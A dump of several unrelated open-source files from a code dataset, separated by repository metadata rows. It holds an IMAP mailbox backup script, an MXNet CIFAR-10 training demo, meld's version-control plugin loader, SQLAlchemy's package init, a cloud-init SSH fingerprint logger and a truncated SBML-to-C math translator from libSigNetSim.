messages = {}
spinner = Spinner("Folder %s" % (foldername))
try:
typ, data = server.select(foldername, readonly=True)
if 'OK' != typ:
raise SkipFolderException("SELECT failed: %s" % (data))
num_msgs = int(data[0])
# each message
for num in range(1, num_msgs+1):
# Retrieve Message-Id
typ, data = server.fetch(num, '(BODY[HEADER.FIELDS (MESSAGE-ID)])')
if 'OK' != typ:
raise SkipFolderException("FETCH %s failed: %s" % (num, data))
header = data[0][1].strip()
# remove newlines inside Message-Id (a dumb Exchange trait)
header = BLANKS_RE.sub(' ', header)
try:
msg_id = MSGID_RE.match(header).group(1)
if msg_id not in messages.keys():
# avoid adding dupes
messages[msg_id] = num
except (IndexError, AttributeError):
# Some messages may have no Message-Id, so we'll synthesise one
# (this usually happens with Sent, Drafts and .Mac news)
typ, data = server.fetch(num, '(BODY[HEADER.FIELDS (FROM TO CC DATE SUBJECT)])')
if 'OK' != typ:
raise SkipFolderException("FETCH %s failed: %s" % (num, data))
header = data[0][1].strip()
header = header.replace('\r\n','\t')
messages['<' + UUID + '.' + sha.sha(header).hexdigest() + '>'] = num
spinner.spin()
finally:
spinner.stop()
print ":",
# done
print "%d messages" % (len(messages.keys()))
return messages
def parse_paren_list(row):
"""Parses the nested list of attributes at the start of a LIST response"""
# eat starting paren
assert(row[0] == '(')
row = row[1:]
result = []
# NOTE: RFC3501 doesn't fully define the format of name attributes
name_attrib_re = re.compile("^\s*(\\\\[a-zA-Z0-9_]+)\s*")
# eat name attributes until ending paren
while row[0] != ')':
# recurse
if row[0] == '(':
paren_list, row = parse_paren_list(row)
result.append(paren_list)
# consume name attribute
else:
match = name_attrib_re.search(row)
assert(match != None)
name_attrib = row[match.start():match.end()]
row = row[match.end():]
#print "MATCHED '%s' '%s'" % (name_attrib, row)
name_attrib = name_attrib.strip()
result.append(name_attrib)
# eat ending paren
assert(')' == row[0])
row = row[1:]
# done!
return result, row
def parse_string_list(row):
"""Parses the quoted and unquoted strings at the end of a LIST response"""
slist = re.compile('\s*(?:"([^"]+)")\s*|\s*(\S+)\s*').split(row)
return [s for s in slist if s]
def parse_list(row):
"""Prases response of LIST command into a list"""
row = row.strip()
paren_list, row = parse_paren_list(row)
string_list = parse_string_list(row)
assert(len(string_list) == 2)
return [paren_list] + string_list
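# e.g. parse_list('(\\HasNoChildren) "/" "INBOX.Sent"')
#      -> [['\\HasNoChildren'], '/', 'INBOX.Sent']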
def get_hierarchy_delimiter(server):
"""Queries the imapd for the hierarchy delimiter, eg. '.' in INBOX.Sent"""
# see RFC 3501 page 39 paragraph 4
typ, data = server.list('', '')
assert(typ == 'OK')
assert(len(data) == 1)
lst = parse_list(data[0]) # [attribs, hierarchy delimiter, root name]
hierarchy_delim = lst[1]
# NIL if there is no hierarchy
if 'NIL' == hierarchy_delim:
hierarchy_delim = '.'
return hierarchy_delim
def get_names(server, compress):
"""Get list of folders, returns [(FolderName,FileName)]"""
spinner = Spinner("Finding Folders")
# Get hierarchy delimiter
delim = get_hierarchy_delimiter(server)
spinner.spin()
# Get LIST of all folders
typ, data = server.list()
assert(typ == 'OK')
spinner.spin()
names = []
# parse each LIST, find folder name
for row in data:
lst = parse_list(row)
foldername = lst[2]
suffix = {'none':'', 'gzip':'.gz', 'bzip2':'.bz2'}[compress]
filename = '.'.join(foldername.split(delim)) + '.mbox' + suffix
names.append((foldername, filename))
# done
spinner.stop()
print ": %s folders" % (len(names))
return names
def print_usage():
"""Prints usage, exits"""
# " "
print "Usage: imapbackup [OPTIONS] -s HOST -u USERNAME [-p PASSWORD]"
print " -a --append-to-mboxes Append new messages to mbox files. (default)"
print " -y --yes-overwrite-mboxes Overwite existing mbox files instead of appending."
print " -n --compress=none Use one plain mbox file for each folder. (default)"
print " -z --compress=gzip Use mbox.gz files. Appending may be very slow."
print " -b --compress=bzip2 Use mbox.bz2 files. Appending not supported: use -y."
print " -f --=folder Specifify which folders use. Comma separated list."
print " -e --ssl Use SSL. Port defaults to 993."
print " -k KEY --key=KEY PEM private key file for SSL. Specify cert, too."
print " -c CERT --cert=CERT PEM certificate chain for SSL. Specify key, too."
print " Python's SSL module doesn't check the cert chain."
print " -s HOST --server=HOST Address of server, port optional, eg. mail.com:143"
print " -u USER --user=USER Username to log into server"
print " -p PASS --pass=PASS Prompts for password if not specified."
print " -K KEY --sqkey=KEY Squirtle KEY to use."
print " -L x --loop=x Loop and loop and loop, waiting 'x' seconds btwn loops"
print "\nNOTE: Maildir is created in a directory based upon username"
sys.exit(2)
def process_cline():
"""Uses getopt to process command line, returns (config, warnings, errors)"""
# read command line
try:
short_args = "aynzbek:c:s:u:p:f:K:L:"
long_args = ["append-to-mboxes", "yes-overwrite-mboxes", "compress=", "sqkey=", "loop="
"ssl", "keyfile=", "certfile=", "server=", "user=", "pass=", "folders="]
opts, extraargs = getopt.getopt(sys.argv[1:], short_args, long_args)
except getopt.GetoptError:
print_usage()
warnings = []
config = {'compress':'none', 'overwrite':False, 'usessl':False}
errors = []
# empty command line
if not len(opts) and not len(extraargs):
print_usage()
# process each command line option, save in config
for option, value in opts:
if option in ("-a", "--append-to-mboxes"):
config['overwrite'] = False
elif option in ("-y", "--yes-overwrite-mboxes"):
warnings.append("Existing mbox files will be overwritten!")
config["overwrite"] = True
elif option == "-n":
config['compress'] = 'none'
elif option == "-z":
config['compress'] = 'gzip'
elif option == "-b":
config['compress'] = 'bzip2'
elif option == "--compress":
if value in ('none', 'gzip', 'bzip2'):
config['compress'] = value
else:
errors.append("Invalid compression type specified.")
elif option in ("-e", "--ssl"):
config['usessl'] = True
elif option in ("-k", "--keyfile"):
config['keyfilename'] = value
elif option in ("-f", "--folders"):
config['folders'] = value
elif option in ("-c", "--certfile"):
config['certfilename'] = value
elif option in ("-s", "--server"):
config['server'] = value
elif option in ("-u", "--user"):
config['user'] = value
elif option in ("-p", "--pass"):
config['pass'] = value
elif option in ("-K", "--sqkey"):
config['sqkey'] = value
elif option in ("-L", "--loop"):
config['loop'] = value
else:
errors.append("Unknown option: " + option)
# don't ignore extra arguments
for arg in extraargs:
errors.append("Unknown argument: " + arg)
# done processing command line
return (config, warnings, errors)
def check_config(config, warnings, errors):
"""Checks the config for consistency, returns (config, warnings, errors)"""
if config['compress'] == 'bzip2' and config['overwrite'] == False:
errors.append("Cannot append new messages to mbox.bz2 files. Please specify -y.")
if config['compress'] == 'gzip' and config['overwrite'] == False:
warnings.append(
"Appending new messages to mbox.gz files is very slow. Please Consider\n"
" using -y and compressing the files yourself with gzip -9 *.mbox")
if 'server' not in config :
errors.append("No server specified.")
if 'user' not in config:
errors.append("No username specified.")
if ('keyfilename' in config) ^ ('certfilename' in config):
errors.append("Please specify both key and cert or neither.")
if 'keyfilename' in config and not config['usessl']:
errors.append("Key specified without SSL. Please use -e or --ssl.")
if 'certfilename' in config and not config['usessl']:
errors.append("Certificate specified without SSL. Please use -e or --ssl.")
if 'server' in config and ':' in config['server']:
# get host and port strings
bits = config['server'].split(':', 1)
config['server'] = bits[0]
# port specified, convert it to int
if len(bits) > 1 and len(bits[1]) > 0:
try:
port = int(bits[1])
if port > 65535 or port < 0:
raise ValueError
config['port'] = port
except ValueError:
errors.append("Invalid port. Port must be an integer between 0 and 65535.")
return (config, warnings, errors)
def get_config():
"""Gets config from command line and console, returns config"""
# config = {
# 'compress': 'none' or 'gzip' or 'bzip2'
# 'overwrite': True or False
# 'server': String
# 'port': Integer
# 'user': String
# 'pass': String
# 'usessl': True or False
# 'keyfilename': String or None
# 'certfilename': String or None
# }
config, warnings, errors = process_cline()
config, warnings, errors = check_config(config, warnings, errors)
# show warnings
for warning in warnings:
print "WARNING:", warning
# show errors, exit
for error in errors:
print "ERROR", error
if len(errors):
sys.exit(2)
# prompt for password, if necessary
if 'pass' not in config and 'sqkey' not in config:
config['pass'] = getpass.getpass()
# defaults
if not 'port' in config:
if config['usessl']:
config['port'] = 993
else:
config['port'] = 143
# done!
return config
def connect_and_login(config):
"""Connects to the server and logs in. Returns IMAP4 object."""
try:
assert(not (('keyfilename' in config) ^ ('certfilename' in config)))
if config['usessl'] and 'keyfilename' in config:
print "Connecting to '%s' TCP port %d," % (config['server'], config['port']),
print "SSL, key from %s," % (config['keyfilename']),
print "cert from %s " % (config['certfilename'])
server = imaplib.IMAP4_SSL(config['server'], config['port'],
config['keyfilename'], config['certfilename'])
elif config['usessl']:
print "Connecting to '%s' TCP port %d, SSL" % (config['server'], config['port'])
server = imaplib.IMAP4_SSL(config['server'], config['port'])
else:
print "Connecting to '%s' TCP port %d" % (config['server'], config['port'])
server = imaplib.IMAP4(config['server'], config['port'])
if 'sqkey' in config:
print "Logging in with Squirtle key '%s'" % (config['sqkey'])
login_squirtle(server, config['sqkey'])
else:
print "Logging in as '%s'" % (config['user'])
server.login(config['user'], config['pass'])
except socket.gaierror, e:
(err, desc) = e
print "ERROR: problem looking up server '%s' (%s %s)" % (config['server'], err, desc)
sys.exit(3)
except socket.error, e:
if str(e) == "SSL_CTX_use_PrivateKey_file error":
print "ERROR: error reading private key file '%s'" % (config['keyfilename'])
elif str(e) == "SSL_CTX_use_certificate_chain_file error":
print "ERROR: error reading certificate chain file '%s'" % (config['keyfilename'])
else:
print "ERROR: could not connect to '%s' (%s)" % (config['server'], e)
sys.exit(4)
return server
def process_messages(server, config):
names = get_names(server, config['compress'])
if config.get('folders'):
dirs = map (lambda x: x.strip(), config.get('folders').split(','))
names = filter (lambda x: x[0] in dirs, names)
#for n in range(len(names)):
# print n, names[n]
for name_pair in names:
try:
foldername, filename = name_pair
fol_messages = scan_folder(server, foldername)
fil_messages = scan_file(config['user'], foldername, config['compress'], config['overwrite'])
new_messages = {}
for msg_id in fol_messages:
if msg_id not in fil_messages:
new_messages[msg_id] = fol_messages[msg_id]
#for f in new_messages:
# print "%s : %s" % (f, new_messages[f])
download_messages(server, config['user'], foldername, new_messages, config)
except SkipFolderException, e:
print e
def main():
"""Main entry point"""
try:
config = get_config()
server = connect_and_login(config)
"""Check to see if Maildir exists, create if not"""
path = config['user']
if not os.path.isdir(path):
os.mkdir(path, 0700)
os.mkdir(os.path.join(path, 'tmp'), 0700)
os.mkdir(os.path.join(path, 'new'), 0700)
os.mkdir(os.path.join(path, 'cur'), 0700)
if 'loop' in config:
while 1:
process_messages(server, config)
print "---------------------------------------------------------"
time.sleep(float(config['loop']))
else:
process_messages(server, config)
print "Disconnecting"
server.logout()
except socket.error, e:
(err, desc) = e
print "ERROR: %s %s" % (err, desc)
sys.exit(4)
except imaplib.IMAP4.error, e:
print "ERROR:", e
sys.exit(5)
# From http://www.pixelbeat.org/talks/python/spinner.py
def cli_exception(typ, value, traceback):
"""Handle CTRL-C by printing newline instead of ugly stack trace"""
if not issubclass(typ, KeyboardInterrupt):
sys.__excepthook__(typ, value, traceback)
else:
sys.stdout.write("\n")
sys.stdout.flush()
if sys.stdin.isatty():
sys.excepthook = cli_exception
# Hideous fix to counteract http://python.org/sf/1092502
# (which should have been fixed ages ago.)
# Also see http://python.org/sf/1441530
def _fixed_socket_read(self, size=-1):
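    # patched socket._fileobject.read that never asks recv() for more bytes than are still needed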
data = self._rbuf
if size < 0:
# Read until EOF
buffers = []
if data:
buffers.append(data)
self._rbuf = ""
if self._rbufsize <= 1:
recv_size = self.default_bufsize
else:
recv_size = self._rbufsize
while True:
data = self._sock.recv(recv_size)
if not data:
break
buffers.append(data)
return "".join(buffers)
else:
# Read until size bytes or EOF seen, whichever comes first
buf_len = len(data)
if buf_len >= size:
self._rbuf = data[size:]
return data[:size]
buffers = []
if data:
buffers.append(data)
self._rbuf = ""
while True:
left = size - buf_len
recv_size = min(self._rbufsize, left) # the actual fix
data = self._sock.recv(recv_size)
if not data:
break
buffers.append(data)
n = len(data)
if n >= left:
self._rbuf = data[left:]
buffers[-1] = data[:left]
break
buf_len += n
return "".join(buffers)
# Platform detection to enable socket patch
if 'Darwin' in platform.platform() and '2.3.5' == platform.python_version():
socket._fileobject.read = _fixed_socket_read
if 'Windows' in platform.platform():
socket._fileobject.read = _fixed_socket_read
if __name__ == '__main__':
gc.enable()
main()
| gpl-3.0 | 6,713,781,112,720,833,000 | 32.521127 | 131 | 0.620252 | false |
z01nl1o02/tests | mxnet/cifar/cifar10/demo.py | 1 | 2581 | import mxnet as mx
from mxnet.gluon import nn
from mxnet import gluon
import sys
import utils
import pdb, os
from importlib import import_module
import logging
import numpy as np
trainBatchSize = 100
testBatchSize = 50
dataShape = (3,32,32)
classNum = 10
pretrained = None
checkpoints = 'checkpoints/'
inputroot = "c:/dataset/cifar/split/"
lr_base = 0.01
weight_decay = 0.0005
mean = np.zeros(dataShape)
mean[0,:,:] = 0.4914
mean[1,:,:] = 0.4822
mean[2,:,:] = 0.4465
std = np.zeros(dataShape)
std[0,:,:] = 0.2023
std[1,:,:] = 0.1994
std[2,:,:] = 0.2010
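# commonly quoted per-channel mean/std statistics of the CIFAR-10 training set, broadcast over HxW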
def test_transform(X,Y):
out = X.astype(np.float32)/255.0
out = np.transpose(out,(2,0,1))
#pdb.set_trace()
#return (mx.image.color_normalize(out,np.asarray([0.4914, 0.4822, 0.4465]), np.asarray([0.2023, 0.1994, 0.2010])),Y)
    return (mx.image.color_normalize(out.asnumpy(), mean, std), Y)
def train_transform(X,Y):
return test_transform(X,Y)
def get_net():
mod = import_module('symbol.resnet18')
net = mod.get_symbol(classNum,utils.try_gpu())
return net
def get_train_test(): #mxnet 1.0.0
train_ds = mx.gluon.data.vision.ImageFolderDataset( os.path.join(inputroot, 'train') , flag=1, transform = train_transform)
test_ds = mx.gluon.data.vision.ImageFolderDataset( os.path.join(inputroot, 'test'), flag=1, transform = test_transform)
for label,labelname in enumerate( train_ds.synsets ):
logging.info('%d %s'%(label, labelname))
loader = mx.gluon.data.DataLoader
    train_data = loader(train_ds, trainBatchSize, shuffle=True, last_batch='keep')
    test_data = loader(test_ds, testBatchSize, shuffle=True, last_batch='keep')
return (train_data, test_data)
def get_trainer(net):
loss = gluon.loss.SoftmaxCrossEntropyLoss()
trainer = gluon.Trainer(net.collect_params(),"sgd",{'learning_rate':lr_base, 'momentum':0.9, 'wd':weight_decay})
return (trainer,loss)
def main():
net = get_net()
net_str = '%s'%net
#logging.info('ok')
logging.info(net_str)
if pretrained is not None:
net.load_params(pretrained,ctx=utils.try_gpu())
train_data, test_data = get_train_test()
trainer,loss = get_trainer(net)
    utils.train(train_data, test_data, trainBatchSize,
                net, loss, trainer, utils.try_gpu(), 1000,
                500, 0.1, print_batches=100, chk_pts_dir=checkpoints)
if __name__=="__main__":
logging.basicConfig(format='%(asctime)s %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p',filename="train.log", level=logging.INFO)
main()
| gpl-2.0 | -2,859,128,899,069,319,700 | 30.096386 | 130 | 0.649361 | false |
kaiw/meld | meld/vc/__init__.py | 1 | 3230 | ### Copyright (C) 2002-2005 Stephen Kennedy <[email protected]>
### Redistribution and use in source and binary forms, with or without
### modification, are permitted provided that the following conditions
### are met:
###
### 1. Redistributions of source code must retain the above copyright
### notice, this list of conditions and the following disclaimer.
### 2. Redistributions in binary form must reproduce the above copyright
### notice, this list of conditions and the following disclaimer in the
### documentation and/or other materials provided with the distribution.
### THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
### IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
### OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
### IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
### INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
### NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
### DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
### THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
### (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
### THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os
import glob
from . import _null
from ._vc import DATA_NAME, DATA_STATE, DATA_REVISION, DATA_OPTIONS
def load_plugins():
_vcdir = os.path.dirname(os.path.abspath(__file__))
ret = []
for plugin in glob.glob(os.path.join(_vcdir, "[a-z]*.py")):
modname = "meld.vc.%s" % os.path.basename(os.path.splitext(plugin)[0])
        ret.append(__import__(modname, globals(), locals(), "*"))
return ret
_plugins = load_plugins()
def get_plugins_metadata():
ret = []
for p in _plugins:
# Some plugins have VC_DIR=None until instantiated
if p.Vc.VC_DIR:
ret.append(p.Vc.VC_DIR)
# Most plugins have VC_METADATA=None
if p.Vc.VC_METADATA:
ret.extend(p.Vc.VC_METADATA)
return ret
vc_sort_order = (
"Git",
"Bazaar",
"Mercurial",
"Fossil",
"Monotone",
"Darcs",
"SVK",
"Subversion",
"Subversion 1.7",
"CVS",
)
def get_vcs(location):
    """Pick only the VCs with the longest repo root
    Some VC plugins find their repository root by walking the
    filesystem upwards from the given location, and now that we
    display multiple VCs for the same directory we must filter out
    the other repositories found on the search path towards "/",
    as they are not relevant to the user.
    """
vcs = []
max_len = 0
for plugin in _plugins:
try:
avc = plugin.Vc(location)
l = len(avc.root)
if l == max_len:
vcs.append(avc)
elif l > max_len:
max_len = l
vcs = [avc]
except ValueError:
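            # the plugin raises ValueError when location is not inside one of its repositories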
pass
if not vcs:
# No plugin recognized that location, fallback to _null
return [_null.Vc(location)]
vc_sort_key = lambda v: vc_sort_order.index(v.NAME)
vcs.sort(key=vc_sort_key)
return vcs
| gpl-2.0 | 4,926,562,048,158,405,000 | 32.645833 | 78 | 0.64644 | false |
Widiot/simpleblog | venv/lib/python3.5/site-packages/sqlalchemy/__init__.py | 1 | 2218 | # sqlalchemy/__init__.py
# Copyright (C) 2005-2017 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
from .sql import (
alias,
all_,
and_,
any_,
asc,
between,
bindparam,
case,
cast,
collate,
column,
delete,
desc,
distinct,
except_,
except_all,
exists,
extract,
false,
func,
funcfilter,
insert,
intersect,
intersect_all,
join,
lateral,
literal,
literal_column,
modifier,
not_,
null,
or_,
outerjoin,
outparam,
over,
select,
subquery,
table,
tablesample,
text,
true,
tuple_,
type_coerce,
union,
union_all,
update,
within_group,
)
from .types import (
ARRAY,
BIGINT,
BINARY,
BLOB,
BOOLEAN,
BigInteger,
Binary,
Boolean,
CHAR,
CLOB,
DATE,
DATETIME,
DECIMAL,
Date,
DateTime,
Enum,
FLOAT,
Float,
INT,
INTEGER,
Integer,
Interval,
JSON,
LargeBinary,
NCHAR,
NVARCHAR,
NUMERIC,
Numeric,
PickleType,
REAL,
SMALLINT,
SmallInteger,
String,
TEXT,
TIME,
TIMESTAMP,
Text,
Time,
TypeDecorator,
Unicode,
UnicodeText,
VARBINARY,
VARCHAR,
)
from .schema import (
CheckConstraint,
Column,
ColumnDefault,
Constraint,
DefaultClause,
FetchedValue,
ForeignKey,
ForeignKeyConstraint,
Index,
MetaData,
PassiveDefault,
PrimaryKeyConstraint,
Sequence,
Table,
ThreadLocalMetaData,
UniqueConstraint,
DDL,
BLANK_SCHEMA
)
from .inspection import inspect
from .engine import create_engine, engine_from_config
__version__ = '1.1.15'
def __go(lcls):
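    # build __all__ from the package namespace (skipping private names and
    # modules) and resolve sqlalchemy's deferred cross-module dependencies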
global __all__
from . import events
from . import util as _sa_util
import inspect as _inspect
__all__ = sorted(name for name, obj in lcls.items()
if not (name.startswith('_') or _inspect.ismodule(obj)))
_sa_util.dependencies.resolve_all("sqlalchemy")
__go(locals())
| mit | 8,256,549,886,487,883,000 | 14.191781 | 77 | 0.583859 | false |
cbuben/cloud-init | cloudinit/config/cc_ssh_authkey_fingerprints.py | 1 | 3690 | # vi: ts=4 expandtab
#
# Copyright (C) 2012 Yahoo! Inc.
#
# Author: Joshua Harlow <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3, as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import base64
import hashlib
from prettytable import PrettyTable
# Ensure this is aliased to a name not 'distros'
# since the module attribute 'distros'
# is a list of distros that are supported, not a sub-module
from cloudinit import distros as ds
from cloudinit import ssh_util
from cloudinit import util
def _split_hash(bin_hash):
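    # 'abcdef' -> ['ab', 'cd', 'ef'], later joined with ':' to form a fingerprint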
split_up = []
for i in xrange(0, len(bin_hash), 2):
split_up.append(bin_hash[i:i + 2])
return split_up
def _gen_fingerprint(b64_text, hash_meth='md5'):
if not b64_text:
return ''
# TBD(harlowja): Maybe we should feed this into 'ssh -lf'?
try:
hasher = hashlib.new(hash_meth)
hasher.update(base64.b64decode(b64_text))
return ":".join(_split_hash(hasher.hexdigest()))
except (TypeError, ValueError):
# Raised when b64 not really b64...
# or when the hash type is not really
# a known/supported hash type...
return '?'
def _is_printable_key(entry):
if any([entry.keytype, entry.base64, entry.comment, entry.options]):
if (entry.keytype and
entry.keytype.lower().strip() in ['ssh-dss', 'ssh-rsa']):
return True
return False
def _pprint_key_entries(user, key_fn, key_entries, hash_meth='md5',
prefix='ci-info: '):
if not key_entries:
        message = ("%sno authorized ssh key fingerprints found for user %s.\n"
% (prefix, user))
util.multi_log(message)
return
tbl_fields = ['Keytype', 'Fingerprint (%s)' % (hash_meth), 'Options',
'Comment']
tbl = PrettyTable(tbl_fields)
for entry in key_entries:
if _is_printable_key(entry):
row = []
row.append(entry.keytype or '-')
row.append(_gen_fingerprint(entry.base64, hash_meth) or '-')
row.append(entry.options or '-')
row.append(entry.comment or '-')
tbl.add_row(row)
authtbl_s = tbl.get_string()
authtbl_lines = authtbl_s.splitlines()
max_len = len(max(authtbl_lines, key=len))
lines = [
util.center("Authorized keys from %s for user %s" %
(key_fn, user), "+", max_len),
]
lines.extend(authtbl_lines)
for line in lines:
util.multi_log(text="%s%s\n" % (prefix, line),
stderr=False, console=True)
def handle(name, cfg, cloud, log, _args):
if util.is_true(cfg.get('no_ssh_fingerprints', False)):
log.debug(("Skipping module named %s, "
"logging of ssh fingerprints disabled"), name)
return
hash_meth = util.get_cfg_option_str(cfg, "authkey_hash", "md5")
(users, _groups) = ds.normalize_users_groups(cfg, cloud.distro)
for (user_name, _cfg) in users.items():
(key_fn, key_entries) = ssh_util.extract_authorized_keys(user_name)
_pprint_key_entries(user_name, key_fn,
key_entries, hash_meth)
| gpl-3.0 | 5,022,524,162,396,625,000 | 34.142857 | 79 | 0.615989 | false |
vincent-noel/libSigNetSim | libsignetsim/cwriter/CMathWriter.py | 1 | 12709 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2014-2017 Vincent Noel ([email protected])
#
# This file is part of libSigNetSim.
#
# libSigNetSim is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# libSigNetSim is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with libSigNetSim. If not, see <http://www.gnu.org/licenses/>.
"""
This file ...
"""
from __future__ import print_function
from sympy import simplify, srepr
from libsignetsim.model.math.sympy_shortcuts import *
from libsignetsim.settings.Settings import Settings
from libsignetsim.model.math.MathException import MathException, DelayNotImplemented
class CMathWriter(object):
""" Class for handling math formulaes """
MATH_ERR = -1
MATH_SBML = 0
MATH_INTERNAL = 1
MATH_DEVINTERNAL = 2
MATH_C = 3
MATH_PRETTYPRINT = 4
MATH_FORMULA = 20
MATH_EQUATION = 21
MATH_VARIABLE = 22
MATH_KINETICLAW = 23
MATH_FUNCTION = 24
MATH_RATERULE = 25
MATH_EVENTASSIGNMENT= 26
MATH_ASSIGNMENTRULE = 27
MATH_ALGEBRAICRULE = 28
ZERO = SympyInteger(0)
def __init__(self, model):
""" Constructor """
self.model = model
def writeCCode(self, tree):
math = self.translateForC(tree)
if Settings.verbose >= 2:
print("\n> writeCCode")
print(">> input : %s" % srepr(tree))
print(">> input simplified : %s" % str(tree))
print(">> output : %s" % math)
return math
def translateVariableForC(self, variable, derivative=False):
""" Translates a Sympy symbol in C """
if str(variable) == "_time_":
return "t"
elif str(variable) == "_avogadro_":
return "RT_NA"
t_var = None
if self.model.listOfVariables.containsSymbol(variable):
t_var = self.model.listOfVariables.getBySymbol(variable)
else:
   raise MathException("Cannot find variable %s in the model" % str(variable))
t_pos = None
if t_var.isDerivative():
if derivative:
c_var = "ydot"
else:
c_var = "y"
t_pos = t_var.ind+1
elif t_var.isAssignment():
c_var = "ass"
t_pos = t_var.ind+1
elif t_var.isConstant():
c_var = "cst"
t_pos = t_var.ind+1
elif t_var.isAlgebraic():
if derivative:
c_var = "ydot"
else:
c_var = "y"
t_pos = self.model.nbOdes + t_var.ind+1
else:
raise MathException("Cannot determine the mathematical type of variable %s" % str(variable))
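  # Ith(v, i) is the generated C code's 1-based vector accessor (as in the CVODE examples)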
return "Ith(%s,%s)" % (c_var, t_pos)
def translateForC(self, tree):
""" Translate a sympy tree into a C string """
if isinstance(tree, int):
return "RCONST(%d.0)" % tree
elif isinstance(tree, float):
t_string = "%.16g" % tree
if "." not in t_string and "e" not in t_string:
t_string += ".0"
return "RCONST(%s)" % t_string
elif tree.func == SympySymbol:
return self.translateVariableForC(tree)
elif tree.func == SympyDerivative:
return self.translateVariableForC(tree.args[0], derivative=True)
elif tree.func == SympyInteger:
return "RCONST(%d.0)" % int(tree)
elif tree.func == SympyFloat:
t_string = "%.16g" % float(tree)
if "." not in t_string and "e" not in t_string:
t_string += ".0"
return "RCONST(%s)" % t_string
elif tree.func == SympyRational:
return "(%s/%s)" % (self.translateForC(tree.p), self.translateForC(tree.q))
elif tree.func == SympyNegOne:
return "RCONST(-1.0)"
elif tree.func == SympyOne:
return "RCONST(1.0)"
elif tree.func == SympyHalf:
return "RCONST(0.5)"
elif tree.func == SympyZero:
return "RCONST(0.0)"
elif tree == SympyPi:
return "RT_PI"
elif tree.func == SympyE or tree.func == SympyExp1:
return "RT_E"
elif tree == SympyInf:
return "RT_INF"
elif tree == -SympyInf:
return "-RT_INF"
elif tree == SympyNan:
return "RT_NAN"
elif tree == SympyTrue or tree == True:
return "1"
elif tree == SympyFalse or tree == False:
return "0"
elif tree.func == SympyMax:
return "max(%s, %s)" % (
self.translateForC(tree.args[0]),
self.translateForC(tree.args[1])
)
elif tree.func == SympyAdd:
t_add = "("
for i_arg, arg in enumerate(tree.args):
if i_arg > 0:
t_add = t_add + " + "
t_add = t_add + self.translateForC(arg)
return t_add + ")"
elif tree.func == SympyMul:
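   # fold x**-1 factors into a common divider so products print as (a*b/(c*d))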
if len(tree.args) == 2:
if tree.args[0].func == SympyNegOne:
return "-" + self.translateForC(tree.args[1])
if tree.args[1].func == SympyNegOne:
return "-" + self.translateForC(tree.args[0])
started = False
t_mul = ""
t_divider = ""
for i_arg, arg in enumerate(tree.args):
if arg.func == SympyNegOne:
t_mul = "-" + t_mul
elif arg.func == SympyPow and arg.args[1].func == SympyNegOne:
if t_divider == "":
t_divider = "%s" % self.translateForC(arg.args[0])
else:
t_divider += "*%s" % self.translateForC(arg.args[0])
else:
if started:
t_mul += "*"
started = True
t_mul += self.translateForC(arg)
if t_divider == "":
return t_mul
else:
    return "(" + t_mul + "/(%s))" % t_divider
# AST_FUNCTION_ABS
elif tree.func == SympyAbs:
return "rt_abs(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_QUOTIENT
elif tree.func == SympyQuotient:
return "((int) rt_floor(%s/%s))" % (self.translateForC(tree.args[0]), self.translateForC(tree.args[1]))
# AST_FUNCTION_REM
elif tree.func == SympyRem:
return "((int) fmod(%s, %s))" % (self.translateForC(tree.args[0]), self.translateForC(tree.args[1]))
# AST_FUNCTION_ARCCOS
elif tree.func == SympyAcos:
return "rt_acos(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_ARCCOSH
elif tree.func == SympyAcosh:
return "rt_acosh(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_ARCCOT
elif tree.func == SympyAcot:
return "rt_acot(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_ARCCSC
elif tree.func == SympyAcsc:
return "rt_acsc(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_ARCCOTH
elif tree.func == SympyAcoth:
return "rt_acoth(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_ARCSIN
elif tree.func == SympyAsec:
return "rt_asec(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_ARCSIN
elif tree.func == SympyAsin:
return "rt_asin(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_ARCSINH
elif tree.func == SympyAsinh:
return "rt_asinh(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_ARCTAN
elif tree.func == SympyAtan:
return "rt_atan(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_ARCTANH
elif tree.func == SympyAtanh:
return "rt_atanh(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_CEILING
elif tree.func == SympyCeiling:
return "rt_ceil(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_COS
elif tree.func == SympyCos:
